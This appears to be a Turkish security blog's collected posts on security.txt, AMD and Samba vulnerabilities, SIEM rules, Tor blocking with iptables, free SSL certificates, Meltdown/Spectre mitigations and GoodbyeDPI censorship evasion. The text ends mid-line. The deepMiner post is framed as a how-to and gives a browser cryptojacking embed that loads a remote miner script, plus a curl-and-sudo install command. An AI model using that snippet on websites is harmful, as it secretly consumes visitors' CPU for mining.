Linux ve windows sistemler için temel güvenlik önlemleri ile birlikte gelişmiş güvenlik önemlemleri alma ve optimizasyon hakkında türkçe yazılar ve daha fazlası
Security.txt, web sitelerinin güvenlik politikalarını tanımlamasına izin veren bir standarttır.Security.txt dosyası, güvenlik sorunlarının nasıl bildirileceği konusunda güvenlik araştırmacıları için açık yönergeler belirler.
Security.txt Google için kullandığınız robots.txt’den pek de farksız değildir. Konu hakkın yapılan açıklama ise şu şekildedir.
“When security risks in web services are discovered by independent security researchers who understand the severity of the risk, they often lack the channels to properly disclose them. As a result, security issues may be left unreported. Security.txt defines a standard to help organizations define the process for security researchers to securely disclose security vulnerabilities.”
Yani güvenlik araştırmacıları kimi zaman buldukları açıklıkları veya kusurlu gördükleri yerleri raporlamak isteyeceklerdir ancak iletişim kanalları olmadığı zaman güvenlik sorunlarını bildirmeyeceklerdir. Web sitemiz için oluşturacağımız security.txt dosyamız /.well-known/ içerisinde olmalıdır. Ayrıca sitenizin ana dizinine de ekleyebilirsiniz. Bu well-kown olayının ne olduğuna bakmak için RFC 5785 göz atabilirsiniz.
Security.txt dosyasını oluşturmak için dikkat edilecek hususlar
Contact
Araştırmacıların güvenlik sorunlarını bildirmek için kullanabilecekleri adrestir. Değer bir e-posta adresi, bir telefon numarası ve / veya bir iletişim sayfası olabilir. Kullanılması ZORUNLUDUR.
Encryption
İstediğiniz bir şifreleme anahtarını göstermenizi sağlar. Güvenlik araştırmacıları şifreli olarak sizinle iletişim kurmak isterlerse kullanacaklardır. Açık anahtarınız doğrudan buraya eklenemeyeceği için pgp-key.txt adıyla siteniz içerisine ekleme yapıp linkleme yapmalısınız. Açık anahtar bir web sitesinden alınacaksa web sitesi HTTPS desteklemeli ve üzerinden linkleme işlemi gerçekleştirilmelidir.
Acknowledgments
Güvenlik araştırmacılarının adlarının geçeceği bir alan belirtmek isterseniz kullanabilirsiniz.
Policy
Güvenlik araştırmacılarına nasıl raporlar sunabileceklerini ve dikkat edilmesi gereken kuralları belirteceğiniz alandır. Bu alanda isteğinize bağlı olarak gizlilik koşulları ve/veya güvenlik politika sayfalarını sunabilirsiniz. Farklı bir sayfa eklenecek ise güvenlik politikalarında sayfa içerisine eklemeyi unutmayınız.
Signature
Bir security.txt dosyasının güvenilirliğini sağlamak için kullanılacak olan imzadır. İmzanın tamamı yazılamayacağı için web sitesinden URL verilmesi gerekmekte ve Encryption gibi eklenmiş olan link HTTPS içermelidir.
Hiring
İlgili iş alanlarının sergilenebileceği bölümdür. Güvenlik araştırmacılarına iş imkânı sağlamak isterseniz bu bölümü kullanabilirsiniz.
Örnek Kullanım
Web sitenize eklemek isterseniz aşağıdaki örneği göz önünde bulundurabilirsiniz. İletişim kurulabilecek yerleri Contact altında belirtebilirsiniz. Herhangi bir sınır bulunmadığı için ben 3 adet eklemeyi tercih ettim. Politika olarak gizlilik sözleşmemizi ekleyip güvenilir kaynak olarakta ilerişim alanımızdaki formu kullanmalarını söyledim.
Güvenlik araştırmacıları, AMD’nin Ryzen ve EPYC serisi işlemcilerde 13 kritik Spectre ve Meltdown benzeri güvenlik açığını keşfettiklerini, saldırganların hassas verilere erişmelerine, kalıcı kötü amaçlı yazılımları çip içine yerleştirmelerine ve tehlikeye atılan sistemlere tam erişim sağlamasına olanak tanıdığını iddia etti.
Tüm bu güvenlik açıkları, AMD’nin Zen mimarisi işlemcileri ve yonga setlerinin güvenli diye adlandırdığı bir bölümünde bulunuyor. Genellikle cihaz parola ve şifreleme anahtarları gibi hassas bilgileri depolar ve PC’nizi başlattığınızda kötü amaçlı bir durum olup olmadığından emin olur.(Açıklık ile pek emin olamıyor gibi)
Güvenlik Açıkları
İddia edilen güvenlik açıkları, RYZENFALL, FALLOUT, CHIMERA ve MASTERKEY olmak üzere dört sınıfa ayrılmış durumda. AMD Ryzen, Ryzen Pro, Ryzen Mobile veya EPYC işlemcileri kullanan geniş sunucu, iş istasyonu ve dizüstü bilgisayarlarının tamamını tehdit ediyor.
RYZENFALL
RYZENFALL, kötü amaçlı kodun AMD Secure Processor1 üzerinde tam kontrol sahibi olmasını sağlar.
SMRAM ve Windows Kimlik Bilgisi Koruması izole edilmiş bellek gibi korunan bellek alanlarını okumak ve yazmak için Güvenli İşlemci ayrıcalıklarından yararlanılabilir.
Saldırganlar ayrıca, Windows Credential Guard atlatabilir ve ağ kimlik bilgilerini çalmak için RYZENFALL kullanabilir ve çalınan veriler ile bu ağdaki diğer bilgisayarlara yayılabilir.
RYZENFALL ayrıca Güvenli İşlemciye kalıcı yazılımlar yüklemek için MASTERKEY adında başka bir sorunla birleştirilebilir. Bu durum uzun süreli endüstriyel casusluk için kullanılabilir.
FALLOUT
Bu güvenlik açıkları, saldırganların SMRAM ve Windows Credential Guard izole bellek (VTL-1) gibi korunan bellek alanlarının okunmasına ve bunları değiştirebilmesine izin verir.
Saldırgan, bu güvenlik açıklarından Windows Credential Guard tarafından korunan ağ kimlik bilgilerini çalmak için kullanabilir.
Bir saldırgan, SMM(System Management Mode)2 de uygulanan BIOS’u tekrar yazabilir.
CHIMERA
Geriye dönük iki üretici firması bu açıklığı fark etti: bir tanesi firmware üzerinde, diğeri donanımda (ASIC). Arka kapılar, AMD Ryzen yonga setine kötü amaçlı kodun enjekte edilmesine izin verir.
Chipset, CPU’yu USB, SATA ve PCI-E cihazlarını kontrol eder. Ağ, WiFi ve Bluetooth trafiği genellikle chipset üzerinden de akar. Saldırgan, karmaşık saldırıları başlatmak için araç olarak kullanabilir.
Chipset tabanlı kötü amaçlı yazılımlar, piyasadaki neredeyse tüm güvenlik çözümlerinden kaçabilir.
MASTERKEY
AMD Secure Processor ürün yazılımının çoklu güvenlik açıkları, saldırganların Güvenli İşlemciye sızmasını sağlar.
Piyasadaki neredeyse tüm güvenlik çözümlerine karşı dayanıklı, gizli ve kalıcı kötü amaçlı yazılımları etkinleştirir.
AMD’nin Secure Encrypted Virtualization (SEV) ve Firmware Trusted Platform Module (fTPM) gibi ürünleri üzerinde değişikliklere izin verir.
Donanım tabanlı “ransomware”gibi senaryolar ile saldırganlar tarafından kullanılabilir.
Mart 12 den Mart 13 geçerken akşam saatlerinde samba mail listesinde bir güvenlik yaması yayınlanacağı söylendi. Acil kod adıyla atılan bu mailde büyük bir açıklığın fixlendiği belirtilmişti.
Bugün görüyoruz ki yapılan açıklamalar ile yetkilendirilmemiş kişilerin uzaktan sunuculara karşı DoS saldırıları başlatmasına ve yönetici de dahil olmak üzere diğer kullanıcıların parolalarını değiştirmesine izin verebilecek iki önemli güvenlik açığını kapattılar.
Sambadan kısaca bahsetmemiz gerekirse. Windows işletim sistemi ile ağ paylaşımlı klasörleri, dosyaları ve yazıcıları paylaşmak için GNU/Linux veya Mac OS X gibi Windows dışında kalan işletim sistemlerini yönetme imkanı verir.
Tespit Edilen Açıklıklar
Bahsettiğimiz DoS açıklığı CVE-2018-1050 kodu ile atanmış ve 4.0.0’dan itibaren Samba’nın tüm sürümlerini etkiliyor.
Bir diğeri ise CVE-2018-1057 kodu ile atanmış yetkisi olmayan kullanıcıların, LDAP üzerinden yönetici kullanıcıları da dahil olmak üzere diğer kullanıcıların parolalarını değiştirmesine izin veriyor.
Ancak LDAP üzerinden parolaları değiştirmeyi isterse kullanıcıların izinlerini doğru şekilde doğrulayamadığından yalnızca Samba Active Directory DC bu açıklık çalışacaktır.
Her iki açıklıktan kurtulmak için ise bir an önce sunucularınız üzerinde koşan sambayı güncellemeniz gerekiyor.
Bu makalemde sizlere kısaca SIEM‘in ne olduğundan bahsedeceğim ve bu konuda bir kaç örnek kural belirteceğim.
SIEM(Security Information and Event Management) olarak adlandırılıyor. Türkçesi’de tehdit ve olay yönetimi, tabi türkçesini pek kullanan görmek mümkün olmuyor.
Loglar oldukça fazla olmaya başladığında gel zaman git zaman bunların kontrol edilmesi ve aksiyon belirlenmesi gerekiyor. Burada SIEM devreye geliyor. Kurallar yazılıyor ve alarmlar üretiliyor.
Üretilen alarmlara göre aksiyonlar belirlenip uygulanıyor. Logların tek bir merkezde toplanıp analiz edilmesi işlemi oldukça kolay gözüksede yapı büyüdükçe karmaşık bir hal almaya başlıyor.(uygulamalar ile oldukça basit)
Log yönetimi herşeydir log olmadan bir sistemin yönetilmesi, aksiyonların belirlenmesi, önlemlerin alınması gibi olayların yapılması zordur. Çünkü sorunun nerede, ne zaman, ne şekilde yapıldığını bilemezsiniz. Haliyle bilmediğiniz birşey içinde aksiyon yapamaz sorunları çözemezsiniz.
Gelin örnek kurallar ile makalemize devam edelim. Karışık bir şekilde başlangıç için güzel bir liste oluşturdum.
Dışarıdan şirket ağına VPN aracılığıyla yabancı bir ip adresi ile bağlanılırsa alarm oluştur.
Mail sunucusundan çok fazla mail gönderiliyor ise alarm oluştur.
Mail hesaplarına yurt dışından erişim olur ise alarm oluştur.
Şirket web sitesine aynı ip adresinden 20 saniye içerisinde 30’dan fazla GET isteği gelir ise alarm oluştur.
Mesai saatleri dışında sunucularda hesap ve/veya uygulamada oturum açılır ise alarm oluştur.
Bu ve bunun gibi pek çok alarm oluşturabilirsiniz. Kullandığınız yapıda ihtiyaçlarınıza göre kural setleri oluşturabilirsiniz. Hazır sistemler kullanıyorsanız. Kendinize göre kuralları özelleştirebilirsiniz.
OpenVPN key openssl kullanılarak üretilir ve sadece openssl komutu kullanılarak düzenlenebilir.
key’in üzerinde hali hazırda kullanılan parolayı değiştirmek için, yeni bir key oluşturmak yerine aşağıdaki yöntemi kullanarak daha önce kullanılan key’i değiştirin.
Siber suçlular tüm dünyadaki bilgisayar kullanıcıları için büyük bir tehdit haline geliyor. Bu suçluların çoğu çok cesur davranır çünkü internette gizlilik paradoxunun arkasına saklanabileceklerine inanıyorlar.(Teoride)
Neyse ki, bilgisayar korsanları izlenemez durumda değillerdir. Onları belirleyebilir ve birkaç önlemi uygularsanız yetkililerin siber suçlulara karşı bir dava açmasına yardımcı olabilirsiniz.
Tespit Edilen IP Adresini İzleme
Bilgisayar korsanlarını izlemenize yardımcı olacak birkaç temel yönerge. Bir çok gelişmiş bilgisayar korsanının adımlarını takip etmeyle ilgili daha temkinli olacağını unutmayın.
Birçok bilgisayar korsanı, Tor gibi proxy veya VPN gizi çözümleri kullanıyor. Ancak hala izleri bir yerlerde olabilir, ama bunu yapmak biraz zor olabilir.
Bu yönergeler bazı bilgisayar korsanlarını belirlemenize yardımcı olacaktır, ama gerçek hayatta birçok kişiyi yakalamak için bir uzman yardımına ihtiyacınız olacağınıda unutmamalısınız.
Hacker’ı Nasıl Takip Edebilirsiniz
Davetsiz misafirinizin IP adresini tanımlamanız gerekiyor. Bağlantı kurmaya çalışan herhangi bir bilgisayarın IP adresinin ne olduğunu söyleyebilen çeşitli Linux komutları ve araçları var. Bu komutları kullanabiliyor olmanız gerekmektedir bu size bir takım bilgiler verecektir. Ancak tam olarak şu IP adresinden yapılmıştır diyemez.
Google Analytics’te veya başka bir analitik araçta bulabilirsiniz. Keşif için siteye gelen ve anormallik oluşturan tüm kayıtları takip edebilirsiniz. Ayrıca kayıt ettiğiniz loglarınızıda yedeklemeli ve üzerinde çalışmalar başlatmalısınız. Mümkünse loglarınızı aynı sunucu üzerinde bulundurmamanız bilgisayar korsanları tarafından logların temizlenmesi veya değiştirilmesi gibi durumları ortadan kaldıracaktır.
Başka bir alternatif ise, bilgisayar korsanının bulunduğu yer hakkında kaba bir fikir edinmek için GEOIPTool’u kullanmaktır.
Tespit Edilen IP Adresi ile Hackeri Raporlama
Bu teknikleri denediğinizde bilgisayar korsanının tam kimliğini bilemeyecek ve izleyemeyeceksiniz. Bununla birlikte, kullanabileceğiniz birkaç yol olacaktır
İncelemelerin yapılması için uzmanlara ulaşabilirsiniz.
Konu hakkında araştırmayı kendiniz yaptıysanız bulgularınızı yerel yetkililere teslim edebilirsiniz.
Kimliklerini ve kullandığı siteleri öğrendikten sonra yer sağlayıcılarına durumu bildirebilirsiniz.(whois bilgileri ile abuse maillerine kolaylıkla ulaşabilirsiniz.)
Çoğu durum için geleneksel yönetimi öneriyorum. Suçluları bildirmek yapılacakların arasında belkide en önemlisidir.
Tetikte Olun
Bazı bilgisayar korsanları, ellerinde çok fazla zararlı yazılım buluyor ve bunlar üzerinden sistemlere saldırılar gerçekleştiriyorlar. Kendinizi korumak için her zaman bir adım önde olmanız gerekir. Yapılacak adımları en iyi şekilde atmanız ve dehşete kapılıp ortalığı ayağa kaldırmamanız gerekmektedir.
Bilgisayarınızı güvende tutmak için her zaman gerekli adımları atmanız ve zorlu çalışmaları yetkililere bırakmanız gerekir. Çok dikkatli değilseniz, sisteminizde nereye bakacağınızı bilmiyorsanız. Delil niteliğindeki dosyalarda bozulmaya sebebiyet vermemek için lütfen uzmanlar ile iletişime geçmeyi unutmayınız.
Anonimlik için kullanılan tor ağı hoş olmayan şeylere de sebebiyet verebiliyor. Bu yazımızda hiçte hoş olmayan şeyleri önlemeye çalışacağız.
Tor ağını bilmeyeniniz yoktur. Giriş yaptığınızda anonim bir şekilde internette gezinmenize imkan sağlar.(Teoride) Ancak bizim başımıza sıkıntılar çıkartmaktan başka bir işe yaramaz. Bunuda en çok bir servis yönetiyorsanız ve bu servise bağlı web sitesi çalışıyorsa oluşur.
Kullanıcıların bir takım manipülasyonları olabileceği için bu tarz platformları engellememiz gerekiyor. Nasıl hepsini engellersin vb polemiklere girmeyeceğim. Listeler belli bu listeler belirli aralıklarla güncelleniyor.
Olaylara başlamak için linux makinada güvenlik duvarınızın ayarları ile oynamanız gerekecek her ithimale karşı rules.v4 ve rules.v6 dosyanızın yedeklerini almayı unutmayın.
İlk olarak sisteminizde ipset kurulu değilse kurulumunu sistemine göre yapmalısınız. Ardından yasaklanacak bloğu tanımlamalıyız.
ipset create blocktor iphash
Listemizi oluşturduk şimdi tor ağında bulunan ip adreslerini teker teker engellemek için listeyi indirip sisteme dahil ediyoruz.
curl -sSL https://www.dan.me.uk/torlist/ | sed '/^#/d' | while read adress; do
ipset -q -A blocktor $adress
done
En son uyarladığımız bu kod ile ip adreslerini alıp güvenlik duvarımıza engelleyeceğimizi söylüyoruz.
iptables -A INPUT -m set --match-set blocktor src -j DROP
Ayarlamasını yaptığımız blocktor zincirini engelleme işlemini başarılı bir şekilde gerçekleştirdik artık bu zincir içerisinden gelen tüm istekler DROP edilecek.
Bu listeyi güncel tutmak için yapacaklarınız ise yukardaki kodu cron ile ayarlamak saatlik olarak güncelleştirmesi için ayarlamalar yapabilirsiniz.
Bu yazımda sizlere Let’s Encryptdan sonra piyasaya sürülmüş olan ve Let’s Encrypt gibi görev yapan ücretsiz bir sertifika yetkilisi olan AlwaysOnSSL den bahsetmek istiyorum.
AlwaysOnSSL yeni, ücretsiz ve otomatik sertifika üreten bir yetkilidir. Ücretsiz, otomatik ve açık olan Let’s Encrypt’imiz zaten olsa da, HTTPS kullanmamak için herhangi bir mazeret olmadığı için web sitesi güvenliğini herkes tarafından erişilebilir hale getirmeye yardımcı yeni yetkililerin gelmesi oldukça güzel
AlwaysOnSSL, diğer ürünler arasında Symantec ve Digicert sertifikaları satan CertCenter şirketinin bir ürünüdür. CertCenter’dan alabileceğiniz sertifikalar DigiCert‘e aittir; böylece sertifikalar tüm tarayıcılarda sorunsuz bir şekilde çalışmaktadır.
Web arayüzü sayesinde kolay bir şekilde sertifika üretebiliyoruz. Gelin nasıl yapabildiğimize bi bakalım
12 Ay Geçerli Sertifika İmzalamak
Siteye giriş yaptığınızda ilk olarak sizi bekleyen arayüz aşağıdaki gibi buraya alan adınızı hatasız ve eksiksiz giriyorsunuz. Bir sonraki aşama için "Yes, I have access to the domains DNS zone and/or its webspace" seçeneğini seçmeniz gerekiyor.(haliyle)
Hemen ardından sistem bizden CSR oluşturmamızı istiyor. Bunu kolay bir şekilde oluşturabiliyorsunuz. Sunucunuza SSH aracılığı ile bağlanıp aşağıdaki işlemleri yapmanız yeterli.
Ardından oluşan .csr uzantılı dosyanın içerisine giriyorsunuz. Yazan herşeyi kopyalayıp aşağıda istenilen yere ekliyorsunuz.
Burada dikkat etmeniz gereken bir nokta bulunuyor. Size onaylama aşaması için 2 yöntem sunuyor.
Mümkünse "DNS based validation" seçeneğini işaretleyerek devam edin. Dosya kullanmanız ilerleyen zamanlarda güvenlik sorunlarına neden olabilir.
Şimdi geldik en güzel kısma. Alan adınızı aldığınız yere gidiyorsunuz ve aşağıdaki kaydı girebilmek için bir TXT kaydı oluşturuyorsunuz. Bu kayıt ile sitenin hem size ait olduğu anlaşılıyor hemde SSL sertifikanızın onaylanması işlemi kolaylaşıyor.
Ayrıca Let’s Encryptan farklı olarak size verilen SSL sertifikasının geçerlilik süresi 12 Aydır. Yani size kullanımınız için 1 yıl geçerli ücretsiz SSL verilmektedir. Yıl sonu tekrar otomatik olarak alan adınıza göre 1 yıl uzatılarak devam edecektir. Ayrıca sistem size minimum 6 aylık sertifika imzalama hakkıda sunmaktadır.
DNS ile onaylama işleminiz tamamlandığında aşağıdaki gibi gözükecek. SSL sertifikanızı "My Certificates" Alanına giderek alabilirsiniz.
dipnot: Özel anahtar bilgileri içeren bileşenler için indirme yetenekleri, bir sertifika verildikten sonra 3 saate kadar kullanılabilir.
Otomatik Sertifika Alma
Şuan için yapabileceğiniz en iyi yöntem kendi uygulamanızı geliştirmek bunun için API dokümanlarını referans alabilirsiniz. Aynı zamanda firmanın kendi Github depolarında bulunan ve önceden geliştirilmiş entegrasyonlarıda kullanabilirsiniz.
Yeni yöntemler geliştirildiğinde otomatik olarak buradan duyurulacaktır. Veya bu işlemi bir betik yazarak otomatik hale getirebilirsiniz.
API Üzerinden SSL istemek için aşağıdakine benzer bir istek atmanız gerekiyor. Kendinize göre güzelce düzenleyebilirsiniz.
dipnot: Uzun süren SSL keyfi için Let’s Encrypt alternatifi olarak kullanılabilir. İmzalanan SSL Sertifikaları DigiCert tarafından imzalanmaktadır. örn : "DigiCert Global Root G2"
Bu yazımda sizlere daha yeni yeni kendini gösteren ve Coinhive adlı javascript zararlısından sonra geliştirilen bir mining kütüphanesi olan deepMiner’ı anlatmaya çalışacağım.
Nedir
Son zamanlarda hızla çoğalan javascript kötücüllerini hepiniz biliyorsunuz işte onlara bir yenisi daha eklendi. Bu kötücül vakti zamanında bahsedip USOM tarafından yasaklattığımız Coinhive ile birlikte çalışıyor.
CPU Hijacking tekniklerine devam ediyor ve CPU kaynaklarınızı sonuna kadar kullanarak başlıyor kazım işlemine.
XMR(Monero)
ETN(Electroneum)
Olarak 2 adet coin kazımı gerçekeştiriyor. Bu makaleyi yazmadan önce gerekli bildirimler yapılarak. Güvenik duvarı çözümlerinde yaptırımları sağladık ve anti-virüsleride konu hakkında bilgilendirdik.
Nasıl Kullanılır
Kullanımı oldukça basit olan bu uygulamada aşağıdaki kodu siteye eklemek yeterlidir. CPU hijacing işlemi yaparak kaynaklarınızı kullanmaya herhangi bir ayar gerekmeksizin başlar.
<script src="https://digxmr.com/deepMiner.js"></script>
<script>
var miner = new deepMiner.Anonymous('deepMiner_test').start();
</script>
Ayrıca kendinize göre derlemede yapabilirsiniz. Bu uygulama Coinhive göre daha tehlikelidir. Nerede ve ne şekilde kullanılacağı site sahibine kalmaktadır. Tespiti ve engellenmesi biraz daha zordur
Kurulum ve derleme işlemi için aşağıdaki komut kullanılmaktadır.
curl https://raw.githubusercontent.com/deepwn/deepMiner/master/install.sh > install.sh
sudo sh install.sh
Derlenebilmesi ve kurulabilmesi için nginx, nodejs, npm bağımlılıkları bulunmaktadır. Derleme işlemi için önerilen işletim sistemi ise Debian, Ubuntu dur.
Ardından config.json düzenlemesi yapılarak sistem çalıştırılabilir.
Bu uygulama javascript ile geliştirilmiş bir mining proxy aracıdır. Aynı zamanda cüzdan görevi görmektedir. Tarayıcıda çalışabilmesi için tekrar düzenlenmiş ve bu iş için uygun olan 2 adet coini geliştirici arkadaş sisteme eklemiştir. VPS ve Dedicated sunucu üzerinde çalışmakta ve kullanıcısına belli bir oranda tespit edilememezlik sunmaktadır.
pool.elitexmr.com:8080
siapool.electroneum.com:3333
Adlı 2 adet Coin havuzunu otomatik olarak kullanmaktadır. İstenildiği taktirde havuzlar değiştirilebilmektedir. İstenilen her javascript dosyasının içerisine eklenebilir. Tespit edilmesini zorlaştırmak için bir takım işlemlere girilebilir. Web sitesi bağımsız olarak çalışabilmektedir.
Coinhive ile tamamen aynı olan yapısı ile üzerinde her türlü manipülasyon gerçekleştirilebilir. kurulan web sitesi üzerinde otomatik olarak mining işlemleri başka kişilerede aynı kod eklenerek aynı domain üzerinden sağlanabilmektedir.
dipnot: bu eklentinin kullanımından sonra doğacak sonuçlardan sorumlu değilim.
Bu yazımda sizlere modern dünyamızda hepimizi etkileyen CPU açıklıklarından bahsedeceğim. Bu açıklıkları Google Project Zero ve Graz University of Technology güvenlik ekibi tespit etmiştir.
Meltdown ve Spectre, modern işlemcilerde kritik güvenlik açıklarından yararlanmakta. Kernel tarafındaki hataları çoğunuz görmezsiniz yada sistem çalışıyor diye görmezden gelirsiniz.
İşte bu açıklıklar sistemdeki bir takım donanım hatalarından faydalanıyor.Bu donanım hataları, programların şu anda bilgisayarda işlenmekte olan verilerin çalınmasına izin vermektedir. Programlara genellikle diğer programlardan veri okumaya izin verilmezken, kötü niyetli bir program tarafında, çalışan diğer programların belleğinde depolanan bilgileri okumak için Meltdown ve Spectre’i kullanabilir.
Örnek vermek gerekirse
Açıklık sayesinde sanal makinelerden bilgi sızdırılabilir.
Şifre yöneticiniz de veya tarayıcınızda saklanan şifreler okunabilir.
Kişisel fotoğraflarınız görüntülenebilir
E-Postalarınız okunabilir
Anlık iletileriniz görülebilir
Belgeleriniz sızdırılabilir
Meltdown
Meltdown, kullanıcı uygulamaları ve işletim sistemi arasındaki en temel izolasyonu ortadan kaldırır. Bu saldırı, bir programın diğer programların ve işletim sisteminin belleğine, dolayısıyla da sırlarına erişmesini sağlar.
Bilgisayarınızda bu açıklıktan etkilenen bir işlemci varsa ve Yamalanmamış bir işletim sistemi üzerinde çalışıyor ise, bilgileri sızdırma imkanı olacaktır. Hem kişisel bilgisayarlara hemde cloud yapısına uygulanabilmektedir.
Ama dua edelim bu açıklığı kapatmak için yazılımsal çözümler var. Aslında bu çözüm ile işletim sistemlerinin tamamen yapısıda değişecek. Yapılması planlanan bir özelliğin geliştirilmesi ve sistemlere entegre edilmesi bulunan bu açıklıklar ile hızlanacak
1995 yılından günümüze kadar gelen hemen hemen tüm işlemciler bu açıklıktan etkilenmektedir. (Intel Itanium ve Intel Atom Hariç) Şu anda, ARM ve AMD işlemcilerinin Meltdown‘dan da etkilenip etkilenmedikleri belli değil.
Cloud sağlayıcılarına gelecek olursak sanallaştırma alt yapılarında Docker, LXC veya OpenVZ gibi kernel bazlı sanallaştırma uygulayan tüm sağlayıcılar bu açıklıktan direk olarak etkilenmektedir.
Ayrıca yama geçilmemiş tüm donanım tabanlı Cloud sağlayıcılarıda bu açıklıktan etkilenecektir. Vmware ve Hyper-V kullanan firmalar hariç diyebiliriz.
Çözüm
Her işletim sisteminde %5 ile %30 arasında bir performans düşüşü gerektiren bir yama gerekecektir. Yada direk olarak işlemciyi çöpe atıp yenisini almanız gerekecek.
Spectre, farklı uygulamalar arasındaki izolasyonu etkisiz hale getirir. Bir saldırganın, hata vermeyen ve sorunsuz olarak çalışan uygulamaları atlatmasına olanak tanır. Aslında, söz konusu uygulamalardaki güvenlik kontrolleri saldırı yüzeyini artırmak ve Spectre için uygulamaları daha duyarlı hale getirmek için kullanılabilir.
Bu işlemler yapılırken kayıt edilen özellik ve bilgilere erişilemeyeceği için daha önceden yapılan tüm her şey geçersiz kılınacaktır.(Bağı kesilecektir)
Spectre Meltdown’dan daha zor bir açıklıktır, ancak etkilerini hafifletmek oldukça zordur. İşletim sistemlerinin yapısında değişikliğe gidilmesi gerekmektedir.
Hemen hemen piyasada bulunan tüm işlemciler ve sistemler bu açıklıktan etkilenmektedir. Özellikle, Spectre Intel, AMD ve ARM işlemciler üzerinde doğrulanmıştır. Düzeltmesi Meltdown açıklığına oranla daha uzun sürmesi beklenmektedir.
Çözüm
Yazılımsal olarak hemen yapılabilecek bir yama bulunmadığından dolayı şimdilik bu açıklık ile yaşamaya devam edeceksiniz. İşletim sisteminin yapısında yapılacak değişiklikler ile bu sorunun önüne geçilmesi bekleniyor olsa da. İşlemci mimarisinde değişiklik yapılması gerektiği için yeni işlemci almanız şart
chrome://flags/#enable-site-per-process Tarayıcınıza yazıyorsunuz. Çıkan ayara enable diyorsunuz. Yeniden başlatıyorsunuz.
Firefox Kullananlar
Firefox’da default açık gelmesi düşünülen ancak daha sonra kısıtlamalar nedeni ile askıya alınan bir özellik olan izolasyonu aktif edeceğiz. about:config giriş yapıyorsunuz. Ardından arama alanına privacy.firstparty.isolate yazıyorsunuz çıkan değeri True olarak değiştiriyorsunuz.
Güncelleme 1(05.01.2018): Firefox ekibi açıktan firefox kullanıcılarının etkilenmediğini duyurdu, yukarıda bahsi geçen ayarlamaların Firefox için yapılmasına gerek yoktur.
dipnot: Tarayıcı tarafında yaptığınız değişiklikler aktif olan tüm kullanıcı hesaplarının kapanmasına neden olacaktır.
Sabahın erken saatlerinde kalkıp kiminiz işe gidiyor kiminiz okuduğu okulun yollarını tutuyor ama hepimizin tek derdi yasaklı sitelere giriş yapabilmek, internette gezinebilmek ve araştırma yapmak.
Ama hepsinden önemlisi bunları yaparken VPN kullanmamak istiyorsunuz. Çünkü internet hızınızın düştüğünden şikayetçisiniz. Aslında bu sizin yanıldığınız bir durum olsa da sizi bu durumdan kurtarmak istiyorum.
GoodbyeDPI Nedir, Yasaklı Sitelere Giriş Sağlar mı?
Bu yazılım, belirli web sitelerine erişimi engelleyen birçok İnternet Servis Sağlayıcıda bulunan Deep Packet Inspection sistemlerini atlamak için tasarlanmıştır.
Herhangi bir veriyi bloke etmekten kaçınan GoodbyeDPI yasaklı sitelere giriş için kullanılan bir uygulamadır belirli politikalar ile yasaklı sitelere giriş imkânı sağlar. Bunun neticesinde arada yer alan middle box ve/veya dpi araçlarını kullanılamaz hale getirir yani evet yasaklı sitelere giriş sağlayabilirsiniz.
Windows 8.1, 10 ve 11 işletim sistemlerinde yönetici hakları ile birlikte sorunsuz bir şekilde çalışabilir. Windows 7 kullanan arkadaşlar işletim sistemlerini güncellemeli ki bu GoodbyeDPI uygulamasını kullanabilesiniz.
GoodbyeDPI Yasaklı Sitelere Giriş için Nasıl Çalışır?
Genel olarak Türkiye’de kullanılan Procera Networks & Sandvine firmasından tedarik edilen milyon dolarlık PacketLogic DPI cihazını aşağıdaki iki temel prensibe göre atlatmak amacıyla tasarlanmıştır ve aktif olarak geliştirilmektedir.
Pasif DPI
Çoğu Pasif DPI, hedef web sitesinden daha hızlı bir istek göndererek HTTP ve HTTPS trafiğinin arasına girer HTTP 302 ile kullanıcıyı istediği rotaya yönlendirir veya direk olarak TCP Reset paketi göndererek bağlantıyı kapatır.
DPI tarafından gönderilen paketler genellikle 0x0000 veya 0x0001’e başlıklarına sahiptir. Bu paketler sizi başka bir web sitesine yönlendirecekse (sansür sayfası) GoodbyeDPI tarafından engellenir.
Aktif DPI
Bu prensip ile çalışan cihazları atlatmak genel olarak daha karmaşıktır. Şu anda GoodbyeDPI aktif DPI’yı atlatmak için 7 adet farklı yöntem kullanabilmektedir:
İlk veri paketi için TCP seviyesinde kontrol
Sürekli canlı tutma (keep-alive) HTTP oturumları için TCP seviyesinde kontrol
Host başlığını hoSt ile değiştirme
Host başlığı ile değer arasındaki boşluğu kaldırma
HTTP İstekleri (GET, POST vb.) ve URI arasına ek boşluk ekleme
Düşük Time-To-Live değerine, geçersiz checksum değeri veya geçersiz TCP Sequence/Acknowledgement sahip sahte HTTP/HTTPS paketleri göndermek
Yasaklı sitelere giriş için uygulanan bu 7 yöntem TCP ve HTTP standartlarına tam olarak uyumlu olması sebebiyle hiçbir bozulmaya sebep olmaz, DPI engellemelerini aşmak, yasaklı sitelere giriş sağlamak ve veri sınıflandırmalarını şaşırtmak amacıyla rahatlıkla kullanılabilir.
Program, filtreleri ayarlamak ve paketleri kullanıcı alanına yönlendirmek için Windows Filtreleme Platformunu kullanan WinDivert sürücüsünü sisteme yükler ve kullanır. Konsol penceresi göründüğü sürece çalışır ve pencereyi kapattığınızda süreç sona erer.
Yasaklı Sitelere Giriş için GoodbyeDPI Nasıl Kullanılır?
Uygulamayı öncelikli olarak Github adresinden güncel halini indirin.
Sağlayıcınızın internet bağlantınızda uyguladığı erişim engelleme yöntemine göre aksiyon almalısınız lakin genel olarak 2_any_country.cmd komut dosyasını çalıştırırsanız büyük oranda tüm engelleri aşabilirsiniz.
Bu, programın İSS için uygun olup olmadığını anlamanız biraz güç çünkü GoodbyeDPI geliştiricisi uygulamayı harika bir şekilde geliştirmeye devam ettikçe, DPI üreticileri de bununla aynı oranda ürünlerini geliştiriyor ve yasaklı sitelere giriş imkanını kısıtlamaya çalışıyor.
Kullanabileceğiniz gelişmiş parametreler
Usage: goodbyedpi.exe [OPTION...] -p block passive DPI -r replace Host with hoSt -s remove space between host header and its value -m mix Host header case (test.com -> tEsT.cOm) -f <value> set HTTP fragmentation to value -k <value> enable HTTP persistent (keep-alive) fragmentation and set it to value -n do not wait for first segment ACK when -k is enabled -e <value> set HTTPS fragmentation to value -a additional space between Method and Request-URI (enables -s, may break sites) -w try to find and parse HTTP traffic on all processed ports (not only on port 80) --port <value> additional TCP port to perform fragmentation on (and HTTP tricks with -w) --ip-id <value> handle additional IP ID (decimal, drop redirects and TCP RSTs with this ID). This option can be supplied multiple times. --dns-addr <value> redirect UDP DNS requests to the supplied IP address (experimental) --dns-port <value> redirect UDP DNS requests to the supplied port (53 by default) --dnsv6-addr <value> redirect UDPv6 DNS requests to the supplied 